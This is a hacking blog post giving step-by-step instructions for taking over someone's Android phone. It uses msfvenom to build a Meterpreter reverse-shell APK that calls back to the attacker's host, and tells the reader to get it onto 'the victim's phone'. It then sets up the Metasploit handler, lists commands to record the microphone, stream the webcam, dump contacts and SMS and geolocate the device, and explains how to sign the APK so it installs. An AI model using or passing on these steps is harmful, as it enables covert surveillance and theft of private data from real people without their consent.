Home / android hacking / Hack Any Android Phone : msfvenon – Metasploit payload generator

Hack Any Android Phone : msfvenon – Metasploit payload generator

msfvenom is a kali linux hacking tool for android ,is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance known as msfvenom payload.

Hacking With METASPLOIT in Kali Linux is a old tool. Metasploit is enhanced by msfvenom in kali linux. Metasploit is now a outdated tool.

STEPS :

1. Fire Up kali and open command terminal.

2. Set payload and create custom windows executable.
Command:

root@kali:-# msfvenom -p android/meterpreter/reverse_tcp  LHOST=192.168.0.110 LPORT=4444 R > andro.apk

(To know your LHOST, open new terminal and type ifconfig )

Your apk file is being saved in the Home folder.

Note: Don’t add any stray space characters anywhere. Use the command as is (after changing the LHOST and LPORT as needed).

3. Transfer/mail this file (here andro.apk) file to the victim’s phone and install it.

4. Start the metasploit framework console as follows :
   
Command:

root@kali:-# msfconsole

5. Now it’s time to open and setup multi-handler. Follows the steps :

msf  > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.110
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit

        Payload Handler is being started……..

6. When the victims clicks on the app(installed as MAIN ACTIVITY in the menu) in his phone, meterpreter session will be established.

7. Try the following exploit commands :
    – record_mic
    – webcam_snap
    – webcam_stream
    – dump_contacts
    – dump_sms
    – geolocate
************************************************************************

Error fixing(incase you get PARSE ERROR)

Two methods:

1)Type command “d2j-apk-sign andro.apk” 

                                               

                                               or

Steps to follow

  1. Open Signapk folder then open cmd.
  2. Copy the andro.apk(the app you made) in Signapk folder.
  3. Type java -” jar signapk.jar certificate.pem key.pk8 andro.apk andro-signed.apk “in cmd(not double quotes).
  4. copy it in your phone and install it.

Hope this works… :)

*************************************************************************
Just have a look – Tech443

Leave a Reply

Your email address will not be published. Required fields are marked *

*

This site uses Akismet to reduce spam. Learn how your comment data is processed.

x

Check Also

Things You Should Know : Wireless Hacking Intermediate

Things You Should Know : Wireless Hacking Intermediate

In the previous post in the ‘things you should know’ series I discussed Wireless Hacking ...